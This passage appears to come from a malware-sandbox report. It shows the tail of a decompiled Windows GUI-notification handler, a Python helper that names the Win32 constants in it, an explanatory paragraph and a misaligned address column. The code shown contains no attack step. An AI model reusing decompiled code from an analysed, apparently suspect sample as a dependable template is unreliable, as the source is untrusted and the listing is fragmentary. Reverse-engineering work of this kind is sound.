                                          										goto L105;
                                          									}
                                          									__eflags =  *(_t418 + 0x28) & 0x00000011;
                                          									_t385 =  *0xe75824; // 0x1569100
                                          									if(( *(_t418 + 0x28) & 0x00000011) == 0) {
                                          										L109:
                                          										_t237 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t385 + _t424 * 4)))) + 0x4c));
                                          										__eflags = _t237 - 0xffffffff;
                                          										if(_t237 != 0xffffffff) {
                                          											 *((intOrPtr*)(_t418 + 0x30)) = _t237;
                                          											_t385 =  *0xe75824; // 0x1569100
                                          										}
                                          										_t240 =  *( *((intOrPtr*)( *((intOrPtr*)(_t385 + _t424 * 4)))) + 0x48);
                                          										__eflags = _t240;
                                          										if(_t240 < 0) {
                                          											goto L105;
                                          										} else {
                                          											__eflags = _v165;
                                          											if(_v165 == 0) {
                                          												L114:
                                          												 *(_t418 + 0x34) = _t240;
                                          												goto L105;
                                          											}
                                          											__eflags =  *(_t418 + 0x24) & 0x00000001;
                                          											if(( *(_t418 + 0x24) & 0x00000001) == 0) {
                                          												goto L105;
                                          											}
                                          											goto L114;
                                          										}
                                          									}
                                          									_t242 =  *((intOrPtr*)( *((intOrPtr*)(_t385 + _t424 * 4))));
                                          									__eflags =  *((char*)(_t242 + 0x90)) - 0x14;
                                          									if( *((char*)(_t242 + 0x90)) != 0x14) {
                                          										goto L8;
                                          									}
                                          									goto L109;
                                          								} else {
                                          									L105:
                                          									_t222 = 0;
                                          									goto L9;
                                          								}
                                          							}
                                          							__eflags = _t224 - 0x13;
                                          							if(_t224 != 0x13) {
                                          								goto L8;
                                          							}
                                          							goto L100;
                                          						}
                                          						__eflags = _t220 - 0xfffffffb;
                                          						if(_t220 == 0xfffffffb) {
                                          							_v165 = 0;
                                          							E00DB2344(0xe757b0, _t421, 1);
                                          							GetCursorPos( &_v164);
                                          							ScreenToClient( *_t418,  &_v164);
                                          							_t388 = E00DB25DB(0xe757b0,  *_t418);
                                          							_v172 = _t388;
                                          							_v176 = _t388;
                                          							__eflags = _t388 - 0xffffffff;
                                          							if(_t388 != 0xffffffff) {
                                          								L78:
                                          								_t249 =  *0xe75824; // 0x1569100
                                          								_v144 = _t388;
                                          								_t252 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t249 + _t388 * 4)))) + 0x90));
                                          								__eflags = _t252 - 0x10;
                                          								if(_t252 == 0x10) {
                                          									_v140 = _v156.x;
                                          									_v136 = _v156.y;
                                          									_t256 = SendMessageW( *_t418, 0x1111, 0,  &_v140);
                                          									__eflags = _t256;
                                          									if(_t256 == 0) {
                                          										L95:
                                          										ClientToScreen( *_t418,  &_v156);
                                          										_t259 =  *0xe75824; // 0x1569100
                                          										_t390 =  *( *((intOrPtr*)( *((intOrPtr*)(_t259 + _v164.y * 4)))) + 0xc);
                                          										__eflags = _t390;
                                          										if(_t390 == 0) {
                                          											goto L8;
                                          										}
                                          										TrackPopupMenuEx(_t390, 0x80, _v156.x, _v156.y,  *_v120, 0);
                                          										L36:
                                          										_t222 = 1;
                                          										goto L9;
                                          									}
                                          									_v92 = _t256;
                                          									_v96 = 4;
                                          									SendMessageW( *_t418, 0x113e, 0,  &_v96);
                                          									__eflags = _v132 & 0x00000046;
                                          									if((_v132 & 0x00000046) == 0) {
                                          										goto L95;
                                          									}
                                          									_t269 = E00DB2402(0xe757b0, _v60,  &_v148,  &_v164);
                                          									__eflags = _t269;
                                          									if(_t269 == 0) {
                                          										L94:
                                          										_v164.y = _v144;
                                          										goto L95;
                                          									}
                                          									_t392 = _v164.x;
                                          									_t271 =  *0xe75824; // 0x1569100
                                          									_v164.y = _t392;
                                          									_t273 =  *((intOrPtr*)( *((intOrPtr*)(_t271 + _t392 * 4))));
                                          									__eflags =  *(_t273 + 0xc);
                                          									if( *(_t273 + 0xc) != 0) {
                                          										goto L95;
                                          									}
                                          									goto L94;
                                          								}
                                          								__eflags = _t252 - 0x13;
                                          								if(_t252 != 0x13) {
                                          									goto L8;
                                          								}
                                          								_v116 = _v156.x;
                                          								_v112 = _v156.y;
                                          								_t277 = SendMessageW( *_t418, 0x1012, 0,  &_v116);
                                          								__eflags = _t277 - 0xffffffff;
                                          								if(_t277 <= 0xffffffff) {
                                          									L88:
                                          									ClientToScreen( *_t418,  &_v156);
                                          									_t280 =  *0xe75824; // 0x1569100
                                          									_t394 =  *( *((intOrPtr*)( *((intOrPtr*)(_t280 + _v164.y * 4)))) + 0xc);
                                          									__eflags = _t394;
                                          									if(_t394 != 0) {
                                          										TrackPopupMenuEx(_t394, 0, _v156.x, _v156.y,  *_v120, 0);
                                          									}
                                          									goto L8;
                                          								}
                                          								__eflags = _v165;
                                          								if(_v165 != 0) {
                                          									goto L88;
                                          								}
                                          								_v52 = _t277;
                                          								_v56 = 4;
                                          								_t286 = SendMessageW( *_t418, 0x104b, 0,  &_v56);
                                          								__eflags = _t286;
                                          								if(_t286 == 0) {
                                          									goto L8;
                                          								}
                                          								__eflags = _v108 & 0x0000000e;
                                          								if((_v108 & 0x0000000e) == 0) {
                                          									goto L88;
                                          								}
                                          								_t289 = E00DB2402(0xe757b0, _v24,  &_v148,  &_v164);
                                          								__eflags = _t289;
                                          								if(_t289 == 0) {
                                          									L87:
                                          									_v164.y = _v144;
                                          									goto L88;
                                          								}
                                          								_t396 = _v164.x;
                                          								_t291 =  *0xe75824; // 0x1569100
                                          								_v164.y = _t396;
                                          								_t293 =  *( *(_t291 + _t396 * 4));
                                          								__eflags = _t293;
                                          								if(_t293 == 0) {
                                          									goto L87;
                                          								}
                                          								__eflags =  *(_t293 + 0xc);
                                          								if( *(_t293 + 0xc) != 0) {
                                          									goto L88;
                                          								}
                                          								goto L87;
                                          							}
                                          							_t388 = E00DB25DB(0xe757b0, GetParent( *_t418));
                                          							_v164.x = _t388;
                                          							_v168 = _t388;
                                          							__eflags = _t388 - 0xffffffff;
                                          							if(_t388 == 0xffffffff) {
                                          								goto L8;
                                          							}
                                          							_v165 = 1;
                                          							goto L78;
                                          						}
                                          						__eflags = _t220 - 0xfffffffe;
                                          						if(_t220 != 0xfffffffe) {
                                          							goto L8;
                                          						}
                                          						E00DB2344(0xe757b0, _t421, 1);
                                          						GetCursorPos( &_v164);
                                          						ScreenToClient( *_t418,  &_v164);
                                          						_t301 = E00DB25DB(0xe757b0,  *_t418);
                                          						__eflags = _t301 - 0xffffffff;
                                          						if(_t301 == 0xffffffff) {
                                          							goto L8;
                                          						}
                                          						_t400 =  *0xe75824; // 0x1569100
                                          						_t304 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t400 + _t301 * 4)))) + 0x90));
                                          						__eflags = _t304 - 0x10;
                                          						if(_t304 < 0x10) {
                                          							goto L8;
                                          						}
                                          						__eflags = _t304 - 0x11;
                                          						if(_t304 <= 0x11) {
                                          							_v140 = _v156.x;
                                          							_v136 = _v156.y;
                                          							_t308 = SendMessageW( *_t418, 0x1111, 0,  &_v140);
                                          							__eflags = _t308;
                                          							if(_t308 != 0) {
                                          								_v92 = _t308;
                                          								_v96 = 0xc;
                                          								_v84 = 0xf000;
                                          								SendMessageW( *_t418, 0x113e, 0,  &_v96);
                                          								__eflags = _v132 & 0x00000046;
                                          								if((_v132 & 0x00000046) != 0) {
                                          									SendMessageW( *_t418, 0x110b, 9, 0);
                                          									SendMessageW( *_t418, 0x110b, 9, _v128);
                                          								}
                                          							}
                                          							goto L8;
                                          						}
                                          						__eflags = _t304 - 0x13;
                                          						if(_t304 != 0x13) {
                                          							goto L8;
                                          						}
                                          						_v116 = _v156;
                                          						_v112 = _v156.y;
                                          						_t316 = SendMessageW( *_t418, 0x1012, 0,  &_v116);
                                          						__eflags = _t316 - 0xffffffff;
                                          						if(_t316 == 0xffffffff) {
                                          							goto L8;
                                          						}
                                          						_v52 = _t316;
                                          						_v56 = 4;
                                          						SendMessageW( *_t418, 0x104b, 0,  &_v56);
                                          						__eflags = _v108 & 0x0000000e;
                                          						if((_v108 & 0x0000000e) == 0) {
                                          							goto L8;
                                          						}
                                          						_push(0);
                                          						_push(_v24);
                                          						L44:
                                          						E00E3B351();
                                          						goto L8;
                                          					}
                                          					if(__eflags == 0) {
                                          						ReleaseCapture();
                                          						goto L8;
                                          					}
                                          					__eflags = _t220 - 0xfffffec0;
                                          					if(_t220 == 0xfffffec0) {
                                          						L60:
                                          						InvalidateRect( *_t418, 0, 1);
                                          						goto L8;
                                          					}
                                          					__eflags = _t220 - 0xfffffed4;
                                          					if(_t220 == 0xfffffed4) {
                                          						goto L60;
                                          					}
                                          					__eflags = _t220 - 0xffffff93;
                                          					if(_t220 == 0xffffff93) {
                                          						ImageList_SetDragCursorImage( *0xe7585c, 0, 0, 0);
                                          						ImageList_BeginDrag( *0xe7585c, 0, 0xfffffff8, 0xfffffff0);
                                          						SetCapture(_a4);
                                          						 *0xe75860 = _a8;
                                          						_v140 = 0;
                                          						_v132 = 0;
                                          						_v128 = 1;
                                          						E00DB98C0(__ebx,  &_v140);
                                          						_v140 = _a8;
                                          						_v128 = 1;
                                          						E00DB7DE1(__ebx,  &_v116, __eflags, L"@GUI_DRAGID");
                                          						E00DB89B3(0xe76270, _t414, _t418, __eflags,  &_v120,  &_v144, 1);
                                          						E00DB5904( &_v132);
                                          						_t434 = _t418 + 0x20;
                                          						ClientToScreen( *_t418, _t434);
                                          						ImageList_DragEnter(0,  *_t434,  *(_t418 + 0x24));
                                          						E00DB98C0(__ebx,  &_v156);
                                          					} else {
                                          						__eflags = _t220 - 0xffffff94;
                                          						if(_t220 == 0xffffff94) {
                                          							_t435 =  *((intOrPtr*)(_t418 + 4));
                                          							_t339 = E00DB2402(0xe757b0, _t435,  &_v148,  &_v164);
                                          							__eflags = _t339;
                                          							if(_t339 != 0) {
                                          								_t340 =  *0xe75824; // 0x1569100
                                          								_push(0);
                                          								 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t340 + _v164.x * 4)))) + 0x96)) =  *(_t418 + 0x10);
                                          								_push( *((intOrPtr*)(_t418 + 4)));
                                          								E00E3B351();
                                          								_t415 =  *0xe75824; // 0x1569100
                                          								_t409 = _v172;
                                          								_t345 =  *((intOrPtr*)( *((intOrPtr*)(_t415 + _v172 * 4))));
                                          								__eflags =  *(_t345 + 0x28);
                                          								if( *(_t345 + 0x28) > 0) {
                                          									 *0xe757ec = _t435;
                                          									E00DB8047(0xe757f0,  *((intOrPtr*)( *((intOrPtr*)(_t415 + _t409 * 4)))) + 0x24);
                                          									_t350 =  *0xe75824; // 0x1569100
                                          									 *0xe75800 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t350 + _v165 * 4)))) + 0x98));
                                          									SendMessageW( *_t418, 0x1030,  *(_t418 + 0x10), 0xe3b348);
                                          								}
                                          							}
                                          						}
                                          					}
                                          					goto L8;
                                          				}
                                          				if(_t445 == 0) {
                                          					L45:
                                          					_t436 = 0;
                                          					_t355 = SendMessageW( *_t418, 0x110a, 9, 0);
                                          					__eflags = _t355;
                                          					if(_t355 == 0) {
                                          						goto L8;
                                          					}
                                          					_v92 = _t355;
                                          					_v96 = 4;
                                          					_t357 = SendMessageW( *_t418, 0x113e, 0,  &_v96);
                                          					__eflags = _t357;
                                          					if(_t357 == 0) {
                                          						goto L8;
                                          					}
                                          					__eflags =  *(_t418 + 0x34) -  *((intOrPtr*)(_t418 + 0x5c));
                                          					if( *(_t418 + 0x34) ==  *((intOrPtr*)(_t418 + 0x5c))) {
                                          						goto L8;
                                          					}
                                          					__eflags =  *((intOrPtr*)(_t418 + 0xc)) - 0x1000;
                                          					if( *((intOrPtr*)(_t418 + 0xc)) == 0x1000) {
                                          						goto L8;
                                          					}
                                          					__eflags =  *((intOrPtr*)(_t418 + 0xc)) - 1;
                                          					L26:
                                          					if(__eflags == 0) {
                                          						goto L8;
                                          					}
                                          					_push(_t436);
                                          					_push(_v60);
                                          					goto L44;
                                          				}
                                          				_t446 = _t220 - 0xfffffdd9;
                                          				if(_t446 > 0) {
                                          					__eflags = _t220 - 0xfffffdda;
                                          					if(_t220 == 0xfffffdda) {
                                          						_t359 = GetKeyState(0x11);
                                          						__eflags = _t359;
                                          						if(_t359 >= 0) {
                                          							goto L8;
                                          						}
                                          						_t360 = GetKeyState(9);
                                          						__eflags = _t360;
                                          						if(_t360 >= 0) {
                                          							goto L8;
                                          						}
                                          						_t438 = SendMessageW( *_t418, 0x130b, 0, 0);
                                          						_t362 = GetKeyState(0x10);
                                          						__eflags = _t362;
                                          						if(_t362 >= 0) {
                                          							_t439 = _t438 + 1;
                                          							__eflags = _t439;
                                          						} else {
                                          							_t439 = _t438 - 1;
                                          						}
                                          						_push(_t439);
                                          						L43:
                                          						_push( *((intOrPtr*)(_t418 + 4)));
                                          						goto L44;
                                          					}
                                          					__eflags = _t220 - 0xfffffdee;
                                          					if(_t220 == 0xfffffdee) {
                                          						__eflags =  *(_t421 + 0x188);
                                          						if( *(_t421 + 0x188) == 0) {
                                          							goto L8;
                                          						}
                                          						_t416 =  *0xe75834; // 0x2
                                          						_t413 = 3;
                                          						__eflags = _t416 - 0xfffffdd9;
                                          						if(_t416 < 0xfffffdd9) {
                                          							goto L8;
                                          						}
                                          						_t440 =  *0xe75824; // 0x1569100
                                          						do {
                                          							_t364 =  *( *(_t440 + _t413 * 4));
                                          							__eflags = _t364;
                                          							if(_t364 == 0) {
                                          								goto L33;
                                          							}
                                          							__eflags = ( *(_t364 + 0x93) & 0x000000ff) -  *((intOrPtr*)(_t418 + 4));
                                          							if(( *(_t364 + 0x93) & 0x000000ff) ==  *((intOrPtr*)(_t418 + 4))) {
                                          								break;
                                          							}
                                          							L33:
                                          							_t413 = _t413 + 1;
                                          							__eflags = _t413 - _t416;
                                          						} while (_t413 <= _t416);
                                          						__eflags = _t413 - _t416;
                                          						if(_t413 > _t416) {
                                          							goto L8;
                                          						}
                                          						E00DD40BB(_t418 + 0x10,  *((intOrPtr*)( *( *(_t440 + _t413 * 4)) + 0x54)), 0x4f);
                                          						__eflags = 0;
                                          						 *((short*)(_t418 + 0xae)) = 0;
                                          						goto L36;
                                          					}
                                          					__eflags = _t220 - 0xfffffe3d;
                                          					if(_t220 == 0xfffffe3d) {
                                          						goto L45;
                                          					}
                                          					__eflags = _t220 - 0xfffffe64;
                                          					if(_t220 != 0xfffffe64) {
                                          						goto L8;
                                          					}
                                          					_t371 =  *_t418;
                                          					_v148 = _t371;
                                          					_t372 = GetWindowLongW(_t371, 0xfffffff0);
                                          					__eflags = _t372 & 0x00000100;
                                          					if((_t372 & 0x00000100) == 0) {
                                          						goto L8;
                                          					}
                                          					__eflags =  *((short*)(_t418 + 0xc)) - 0x20;
                                          					if( *((short*)(_t418 + 0xc)) != 0x20) {
                                          						goto L8;
                                          					}
                                          					_t436 = 0;
                                          					_t373 = SendMessageW(_v148, 0x110a, 9, 0);
                                          					__eflags = _t373;
                                          					if(_t373 == 0) {
                                          						goto L8;
                                          					}
                                          					_v92 = _t373;
                                          					_v96 = 4;
                                          					__eflags = SendMessageW(_v148, 0x113e, 0,  &_v96);
                                          					goto L26;
                                          				}
                                          				if(_t446 == 0) {
                                          					_t220 = SendMessageW( *_t418, 0x130b, 0, 0);
                                          					L17:
                                          					_push(_t220);
                                          					goto L43;
                                          				}
                                          				if(_t220 == 0xfffffd09) {
                                          					__eflags =  *((char*)(_t421 + 0x199));
                                          					 *((char*)(_t421 + 0x19a)) = 1;
                                          					if( *((char*)(_t421 + 0x199)) != 0) {
                                          						goto L8;
                                          					} else {
                                          						 *((char*)(_t421 + 0x19a)) = 0;
                                          						_push( *(_t418 + 8));
                                          						goto L43;
                                          					}
                                          				}
                                          				if(_t220 == 0xfffffd0e) {
                                          					 *((char*)(_t421 + 0x199)) = 1;
                                          					goto L8;
                                          				}
                                          				if(_t220 == 0xfffffd0f) {
                                          					__eflags =  *((char*)(_t421 + 0x19a)) - 1;
                                          					if( *((char*)(_t421 + 0x19a)) == 1) {
                                          						_push(_t220);
                                          						_push( *((intOrPtr*)(_t418 + 4)));
                                          						E00E3B351();
                                          					}
                                          					 *((short*)(_t421 + 0x199)) = 0;
                                          					goto L8;
                                          				}
                                          				if(_t220 == 0xfffffd16) {
                                          					goto L17;
                                          				}
                                          				goto L8;
                                          			}
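The function above switches on raw 32-bit literals (0xfffffdda, 0xfffffd09, ...) and sends control messages by number (0x130b, 0x110a, 0x113e, 0x1030), so the first triage question is which Win32 common-control notifications and messages those numbers stand for. The decoder below is an added example written for this report; it is not code from the analysed sample or from the sandbox. It assumes nothing about the binary beyond the listing itself: every constant comes from the public commctrl.h and winuser.h headers (the *_FIRST/*_LAST notification bases and the LVM/TVM/TCM message bases), the helper names (to_signed32, decode_notify, decode_message, annotate) are mine, and the sample lines fed to it are copied from the listing above.

```python
"""Decode the raw Win32 common-control constants found in decompiled
WM_NOTIFY handlers.

Added example for this report, not the sample's or the sandbox's code.
All values are the documented commctrl.h / winuser.h constants; the
decompiled sample lines at the bottom are copied from the listing above.
"""
import re

# Notification-code families as (base macro, first, last), signed 32-bit.
NOTIFY_FAMILIES = [
    ("NM_FIRST", 0, -99), ("LVN_FIRST", -100, -199), ("HDN_FIRST", -300, -399),
    ("TVN_FIRST", -400, -499), ("TTN_FIRST", -520, -549), ("TCN_FIRST", -550, -580),
    ("CDN_FIRST", -601, -699), ("TBN_FIRST", -700, -720), ("UDN_FIRST", -721, -729),
    ("DTN_FIRST", -740, -745), ("MCN_FIRST", -746, -752), ("DTN_FIRST2", -753, -799),
    ("CBEN_FIRST", -800, -830), ("RBN_FIRST", -831, -859), ("IPN_FIRST", -860, -879),
    ("SBN_FIRST", -880, -899), ("PGN_FIRST", -900, -950),
]

# Individual notification codes (signed) worth naming outright.
NOTIFY_NAMES = {
    -2: "NM_CLICK", -3: "NM_DBLCLK", -4: "NM_RETURN", -5: "NM_RCLICK",
    -12: "NM_CUSTOMDRAW",
    -101: "LVN_ITEMCHANGED", -108: "LVN_COLUMNCLICK",
    -412: "TVN_KEYDOWN", -451: "TVN_SELCHANGEDW",
    -530: "TTN_GETDISPINFOW",
    -550: "TCN_KEYDOWN", -551: "TCN_SELCHANGE",
    -746: "MCN_SELECT",
    -753: "DTN_CLOSEUP", -754: "DTN_DROPDOWN", -759: "DTN_DATETIMECHANGE",
}

# Control-message bases and the messages the listing uses.
MESSAGE_BASES = [("LVM_FIRST", 0x1000), ("TV_FIRST", 0x1100), ("HDM_FIRST", 0x1200),
                 ("TCM_FIRST", 0x1300), ("PGM_FIRST", 0x1400), ("ECM_FIRST", 0x1500),
                 ("BCM_FIRST", 0x1600), ("CBM_FIRST", 0x1700), ("CCM_FIRST", 0x2000)]
MESSAGE_NAMES = {0x1030: "LVM_SORTITEMS", 0x110a: "TVM_GETNEXTITEM",
                 0x113e: "TVM_GETITEMW", 0x130b: "TCM_GETCURSEL"}

VK_NAMES = {0x09: "VK_TAB", 0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x20: "VK_SPACE"}


def to_signed32(value: int) -> int:
    """Reinterpret a 32-bit literal (0xfffffdda) as the signed int the
    compiler compared against (-550)."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def decode_notify(raw: int):
    """Name a WM_NOTIFY code; fall back to BASE-n when only the family range
    is known; None if the value is not a notification code at all."""
    code = to_signed32(raw)
    if code in NOTIFY_NAMES:
        return NOTIFY_NAMES[code]
    for base, first, last in NOTIFY_FAMILIES:
        if last <= code <= first:
            return f"{base}-{first - code}"
    return None


def decode_message(msg: int):
    """Name a common-control message; fall back to BASE+0xNN."""
    if msg in MESSAGE_NAMES:
        return MESSAGE_NAMES[msg]
    for base, start in MESSAGE_BASES:
        if start <= msg < start + 0x100:
            return f"{base}+0x{msg - start:x}"
    return None


# Patterns matching how the decompiler prints the three constant kinds.
_NOTIFY_LIT = re.compile(r"_t220 (?:==|!=|-) (0x[0-9a-f]{8})")
_SENDMSG = re.compile(r"SendMessageW\(([^,]+), (0x[0-9a-f]{4}),")
_KEYSTATE = re.compile(r"GetKeyState\((0x[0-9a-f]+|[1-9]\d*)\)")


def annotate(line: str) -> str:
    """Append decoded names to one decompiled line; unchanged if none apply."""
    notes = []
    for m in _NOTIFY_LIT.finditer(line):
        name = decode_notify(int(m.group(1), 16))
        if name:
            notes.append(f"{m.group(1)} = {name}")
    for m in _SENDMSG.finditer(line):
        name = decode_message(int(m.group(2), 16))
        if name:
            notes.append(f"{m.group(2)} = {name}")
    for m in _KEYSTATE.finditer(line):
        vk = int(m.group(1), 0)
        if vk in VK_NAMES:
            notes.append(f"{m.group(1)} = {VK_NAMES[vk]}")
    return line if not notes else f"{line.rstrip()}  // {'; '.join(notes)}"


def annotate_listing(lines):
    """Annotate every line of a decompiled listing."""
    return [annotate(line) for line in lines]


# Lines copied from the decompiled function above (constructed sample input).
SAMPLE_LINES = [
    "if(_t220 == 0xfffffdda) {",
    "_t359 = GetKeyState(0x11);",
    "_t438 = SendMessageW( *_t418, 0x130b, 0, 0);",
    "if(_t220 == 0xfffffdee) {",
    "if(_t220 == 0xfffffe3d) {",
    "_t373 = SendMessageW(_v148, 0x110a, 9, 0);",
    "if(_t220 == 0xfffffd09) {",
    "if(_t220 == 0xfffffd16) {",
]

if __name__ == "__main__":
    print("\n".join(annotate_listing(SAMPLE_LINES)))
```

Run over the listing, the names make the branches readable at a glance: 0xfffffdda is TCN_KEYDOWN and the GetKeyState checks on VK_CONTROL, VK_TAB and VK_SHIFT followed by TCM_GETCURSEL +/- 1 are Ctrl+Tab / Ctrl+Shift+Tab tab switching; 0xfffffdee is TTN_GETDISPINFOW, where the loop copies a tooltip string into the NMTTDISPINFOW szText buffer; 0xfffffe64 is TVN_KEYDOWN, which only acts when GetWindowLongW(hwnd, GWL_STYLE) has TVS_CHECKBOXES (0x100) and the key is VK_SPACE; and 0xfffffd09, 0xfffffd0e, 0xfffffd0f and 0xfffffd16 are the date-time picker and month-calendar notifications whose drop-down state is tracked in the two byte flags at +0x199 and +0x19a. That reading is mine, not the report's, but it is the point of decoding the constants: this function is generic GUI-toolkit notification plumbing, and an analyst can move on to the code that actually touches the network or the file system instead of stepping through it.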
Instruction address column for this function (spilled out of the side-by-side listing by extraction; it covers the whole function from its entry at 0x00e3cad2, while the decompiled text above is only the tail, so the entries no longer line up with it; 0x00000000 entries are lines with no address):

0x00e3cad2 0x00e3cad7 0x00e3cadd 0x00e3cae0 0x00e3caec 0x00e3caee 0x00e3caf1 0x00e3caf5
0x00e3caf7 0x00e3cd63 0x00e3cd66 0x00e3cf0b 0x00e3cf0e 0x00e3d2c9 0x00e3d2ce 0x00e3d2d2
0x00e3d2d5 0x00e3cb2e 0x00e3cb37 0x00e3cb3d 0x00e3cb42 0x00e3cb42 0x00e3d2db 0x00e3d2e4
0x00e3d2e6 0x00e3d2ec 0x00e3d2ee 0x00e3d2f8 0x00e3d2fb 0x00e3d2fb 0x00e3d2fc 0x00e3d3b2
0x00000000 0x00e3d3b2 0x00e3d302 0x00e3d302 0x00e3d307 0x00000000 0x00000000 0x00e3d30d
0x00e3d314 0x00e3d318 0x00e3d31a 0x00e3d31a 0x00e3d32e 0x00e3d333 0x00e3d335 0x00e3d33e
0x00e3d343 0x00e3d351 0x00e3d357 0x00e3d35c 0x00000000 0x00000000 0x00e3d35e 0x00e3d362
0x00e3d368 0x00e3d37c 0x00e3d381 0x00e3d384 0x00e3d387 0x00e3d389 0x00e3d38c 0x00e3d38c
0x00e3d397 0x00e3d39a 0x00e3d39c 0x00000000 0x00e3d39e 0x00e3d39e 0x00e3d3a3 0x00e3d3ab
0x00e3d3ab 0x00000000 0x00e3d3ab 0x00e3d3a5 0x00e3d3a9 0x00000000 0x00000000 0x00000000
0x00e3d3a9 0x00e3d39c 0x00e3d36d 0x00e3d36f 0x00e3d376 0x00000000 0x00000000 0x00000000
0x00e3d337 0x00e3d337 0x00e3d337 0x00000000 0x00e3d337 0x00e3d335 0x00e3d2f0 0x00e3d2f2
0x00000000 0x00000000 0x00000000 0x00e3d2f2 0x00e3cf14 0x00e3cf17 0x00e3d07c 0x00e3d083
0x00e3d08d 0x00e3d09a 0x00e3d0a9 0x00e3d0ab 0x00e3d0af 0x00e3d0b3 0x00e3d0b6 0x00e3d0e0
0x00e3d0e0 0x00e3d0e5 0x00e3d0ee 0x00e3d0f4 0x00e3d0f6 0x00e3d1f3 0x00e3d1fb 0x00e3d20c
0x00e3d212 0x00e3d214 0x00e3d27a 0x00e3d281 0x00e3d28b 0x00e3d295 0x00e3d298 0x00e3d29a
0x00000000 0x00000000 0x00e3d2b5 0x00e3cca6 0x00e3cca8 0x00000000 0x00e3cca8 0x00e3d216
0x00e3d227 0x00e3d22f 0x00e3d235 0x00e3d23a 0x00000000 0x00000000 0x00e3d252 0x00e3d257
0x00e3d259 0x00e3d272 0x00e3d276 0x00000000 0x00e3d276 0x00e3d25b 0x00e3d25f 0x00e3d264
0x00e3d26b 0x00e3d26d 0x00e3d270 0x00000000 0x00000000 0x00000000 0x00e3d270 0x00e3d0fc
0x00e3d0fe 0x00000000 0x00000000 0x00e3d10a 0x00e3d112 0x00e3d123 0x00e3d129 0x00e3d12c
0x00e3d1ab 0x00e3d1b2 0x00e3d1bc 0x00e3d1c6 0x00e3d1c9 0x00e3d1cb 0x00e3d1e2 0x00e3d1e2
0x00000000 0x00e3d1cb 0x00e3d12e 0x00e3d133 0x00000000 0x00000000 0x00e3d135 0x00e3d149
0x00e3d154 0x00e3d15a 0x00e3d15c 0x00000000 0x00000000 0x00e3d162 0x00e3d167 0x00000000
0x00000000 0x00e3d17f 0x00e3d184 0x00e3d186 0x00e3d1a3 0x00e3d1a7 0x00000000 0x00e3d1a7
0x00e3d188 0x00e3d18c 0x00e3d191 0x00e3d198 0x00e3d19a 0x00e3d19c 0x00000000 0x00000000
0x00e3d19e 0x00e3d1a1 0x00000000 0x00000000 0x00000000 0x00e3d1a1 0x00e3d0c8 0x00e3d0ca
0x00e3d0ce 0x00e3d0d2 0x00e3d0d5 0x00000000 0x00000000 0x00e3d0db 0x00000000 0x00e3d0db
0x00e3cf1d 0x00e3cf20 0x00000000 0x00000000 0x00e3cf30 0x00e3cf3a 0x00e3cf47 0x00e3cf51
0x00e3cf56 0x00e3cf59 0x00000000 0x00000000 0x00e3cf5f 0x00e3cf6a 0x00e3cf70 0x00e3cf72
0x00000000 0x00000000 0x00e3cf78 0x00e3cf7a 0x00e3cff5 0x00e3cffd 0x00e3d00e 0x00e3d014
0x00e3d016 0x00e3d01c 0x00e3d02d 0x00e3d035 0x00e3d03d 0x00e3d043 0x00e3d048 0x00e3d05e
0x00e3d06d 0x00e3d06d 0x00e3d048 0x00000000 0x00e3d016 0x00e3cf7c 0x00e3cf7e 0x00000000
0x00000000 0x00e3cf8a 0x00e3cf92 0x00e3cfa3 0x00e3cfa9 0x00e3cfac 0x00000000 0x00000000
0x00e3cfb2 0x00e3cfc6 0x00e3cfd1 0x00e3cfd7 0x00e3cfdc 0x00000000 0x00000000 0x00e3cfe2
0x00e3cfe3 0x00e3ccf6 0x00e3ccf6 0x00000000 0x00e3ccf6 0x00e3cd6c 0x00e3cf00 0x00000000
0x00e3cf00 0x00e3cd72 0x00e3cd77 0x00e3ceef 0x00e3cef5 0x00000000 0x00e3cef5 0x00e3cd7d
0x00e3cd82 0x00000000 0x00000000 0x00e3cd88 0x00e3cd8b 0x00e3ce4d 0x00e3ce60 0x00e3ce69
0x00e3ce76 0x00e3ce7b 0x00e3ce7f 0x00e3ce83 0x00e3ce8b 0x00e3ce98 0x00e3cea1 0x00e3cea5
0x00e3ceba 0x00e3cec3 0x00e3cec8 0x00e3cece 0x00e3cedb 0x00e3cee5 0x00e3cd91 0x00e3cd91
0x00e3cd94 0x00e3cd9a 0x00e3cdad 0x00e3cdb2 0x00e3cdb4 0x00e3cdba 0x00e3cdc3 0x00e3cdce
0x00e3cdd5 0x00e3cdd8 0x00e3cddd 0x00e3cde3 0x00e3cdea 0x00e3cdec 0x00e3cdf0 0x00e3cdf6
0x00e3ce0a 0x00e3ce0f 0x00e3ce28 0x00e3ce37 0x00e3ce37 0x00e3cdf0 0x00e3cdb4 0x00e3cd94
0x00000000 0x00e3cd8b 0x00e3cafd 0x00e3cd00 0x00e3cd00 0x00e3cd0c 0x00e3cd12 0x00e3cd14
0x00000000 0x00000000 0x00e3cd1a 0x00e3cd2b 0x00e3cd33 0x00e3cd39 0x00e3cd3b 0x00000000
0x00000000 0x00e3cd44 0x00e3cd47 0x00000000 0x00000000 0x00e3cd4d 0x00e3cd54 0x00000000
0x00000000 0x00e3cd5a 0x00e3cc31 0x00e3cc31 0x00000000 0x00000000 0x00e3cc37 0x00e3cc38
0x00000000 0x00e3cc38 0x00e3cb08 0x00e3cb0a 0x00e3cba1 0x00e3cba6 0x00e3ccb6 0x00e3ccb8
0x00e3ccbb 0x00000000 0x00000000 0x00e3ccc3 0x00e3ccc5 0x00e3ccc8 0x00000000 0x00000000
0x00e3cce1 0x00e3cce3 0x00e3cce9 0x00e3ccec 0x00e3ccf1 0x00e3ccf1 0x00e3ccee 0x00e3ccee
0x00e3ccee 0x00e3ccf2 0x00e3ccf3 0x00e3ccf3 0x00000000 0x00e3ccf3 0x00e3cbac 0x00e3cbb1
0x00e3cc41 0x00e3cc48 0x00000000 0x00000000 0x00e3cc4e 0x00e3cc56 0x00e3cc57 0x00e3cc59
0x00000000 0x00000000 0x00e3cc5f 0x00e3cc65 0x00e3cc68 0x00e3cc6a 0x00e3cc6c 0x00000000
0x00000000 0x00e3cc75 0x00e3cc78 0x00000000 0x00000000 0x00e3cc7a 0x00e3cc7a 0x00e3cc7b
